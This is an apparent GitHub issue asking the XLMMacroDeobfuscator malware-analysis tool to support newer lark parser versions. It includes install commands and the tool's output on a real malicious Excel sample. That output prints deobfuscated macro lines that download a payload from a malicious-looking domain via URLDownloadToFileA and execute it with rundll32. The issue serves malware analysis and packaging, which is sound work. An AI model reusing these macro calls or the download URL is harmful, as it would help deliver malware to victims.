XLMMacroDeobfuscator
XLMMacroDeobfuscator copied to clipboard
DissectMalware
Old version/repository of lark used
Hello, please could you consider updating the API of he lark parser to the current API (1.0.0+)? The pypy project lark-parser was renamed to lark while ago and new updates go only to the lark repository.
Versions up to 0.12.0 work (both old lark-parser and new lark repository), but there was significant API change in the 1.0.0 which broke the API a requires a code change in xlmmacrodeobfuscator.
I have tried packaging the XLMMacroDeobfuscator for Fedora, which worked until Fedora 38 when distributiona were still using old version of lark-parser, but it is common now that the linux distributions switched to new API of lark 1.0.0+. Fedora 38 lark-parser - lark-parser 0.12.0 Fedora 39/40 lark - lark 1.1.7 Debian stable Bookworm - lark 1.1.5 Debian unstable Sid - lark 1.1.9 Ubuntu 22+ - lark 1.1.1+
===== This works python 3.12 - lark<1.0.0
virtualenv --python=$(which python3.12) p3.12
p3.12/bin/pip install setuptools
p3.12/bin/pip install xlmmacrodeobfuscator
p3.12/bin/pip uninstall lark-parser -y
p3.12/bin/pip install 'lark<1.0.0'
p3.12/bin/xlmdeobfuscator -f ~/tmp/malware/edd554502033d78ac18e4bd917d023da2fd64843c823c1be8bc273f48a5f3f5f | grep -e "CALL"
...
CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://ddfspwxrb.club/fb2g424g","c:\Users\Public\csg75ef.html",0,0)
CELL:R16 , FullEvaluation , IF(R[-1]C<0,CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://ddfspwxrb.club/fb2g424g","c:\Users\Public\bwep5ef.html",0,0),)
CELL:R18 , FullEvaluation , CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe","c:\Users\Public\csg75ef.html,DllRegisterServer",0,5)
====== This doesn't work python 3.12 - lark>1.0.0
virtualenv --python=$(which python3.12) p3.12
p3.12/bin/pip install setuptools
p3.12/bin/pip install xlmmacrodeobfuscator
p3.12/bin/pip uninstall lark-parser -y
p3.12/bin/pip install 'lark>1.0.0'
p3.12/bin/xlmdeobfuscator -f ~/tmp/malware/edd554502033d78ac18e4bd917d023da2fd64843c823c1be8bc273f48a5f3f5f | grep -e "CALL"
XLMMacroDeobfuscator: pywin32 is not installed (only is required if you want to use MS Excel)
_ _______
|\ /|( \ ( )
( \ / )| ( | () () |
\ (_) / | | | || || |
) _ ( | | | |(_)| |
/ ( ) \ | | | | | |
( / \ )| (____/\| ) ( |
|/ \|(_______/|/ \|
______ _______ _______ ______ _______ _______ _______ _______ _________ _______ _______
( __ \ ( ____ \( ___ )( ___ \ ( ____ \|\ /|( ____ \( ____ \( ___ )\__ __/( ___ )( ____ )
| ( \ )| ( \/| ( ) || ( ) )| ( \/| ) ( || ( \/| ( \/| ( ) | ) ( | ( ) || ( )|
| | ) || (__ | | | || (__/ / | (__ | | | || (_____ | | | (___) | | | | | | || (____)|
| | | || __) | | | || __ ( | __) | | | |(_____ )| | | ___ | | | | | | || __)
| | ) || ( | | | || ( \ \ | ( | | | | ) || | | ( ) | | | | | | || (\ (
| (__/ )| (____/\| (___) || )___) )| ) | (___) |/\____) || (____/\| ) ( | | | | (___) || ) \ \__
(______/ (_______/(_______)|/ \___/ |/ (_______)\_______)(_______/|/ \| )_( (_______)|/ \__/
....
XLMMacroDeobfuscator(v0.2.7) - https://github.com/DissectMalware/XLMMacroDeobfuscator
File: /home/testuser/tmp/malware/edd554502033d78ac18e4bd917d023da2fd64843c823c1be8bc273f48a5f3f5f
Unencrypted xls file
[Loading Cells]
auto_open: auto_open->'jMAhUST1Sf'!$Q$1
[Starting Deobfuscation]
Error [deobfuscator.py:2598 evaluation_result = self.evaluate_parse_tree(current_cell, parse_tree, interactive)]: 'None'
